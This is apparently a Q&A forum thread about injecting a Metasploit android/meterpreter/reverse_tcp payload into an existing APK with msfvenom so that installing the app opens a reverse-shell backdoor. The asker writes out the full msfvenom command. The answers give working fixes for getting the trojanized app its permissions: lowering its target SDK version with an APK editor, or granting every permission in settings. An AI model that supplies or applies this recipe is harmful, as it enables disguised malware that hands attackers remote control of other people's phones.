payload injected app doesn't ask for any permissions

Question

I'm trying to trying to inject an apk with msfvenom payload, and thus get a backdoor on my android device upon installing it. Why isn't it asking for permissions upon installation?

In the past I've been able to successfully create a standalone payload and get a backdoor tunnel to my device.

msfvenom -p android/meterpreter/reverse_tcp -x /Users/root/Downloads/newApp.apk LHOST=[IP] LPORT=[port] -o /Users/root/Desktop/android.apk

I expected the app to ask for all the permissions specified in manifest file, but it isn't asking for any during installation or at runtime.

Answer 1

I had the same problem, but I have found a fix for it.

1. create apk file injected with payload.
2. install it on your phone.
3. install APK Editor pro v1.9.7.
4. open the apk editor and search for the injected apk click on it and click on COMMON EDIT.
5. change Minimum SDK version to 10 and Target SDK Version to 17.

I have already checked it and it's working

Answer 2

You need to specify what permissions the Main.apk has in your device..did you check those?If it has not asked for permission chances are it has no permission.

Answer 3

I have found some problems in the payload generation, but I have also found a solution.

1.- Inject the payload in the original application.

2.- Install the apk file on an android device.

3.- Go to application settings and search for the infected application.

4.- Grant all permissions.

And that's it, this worked for me.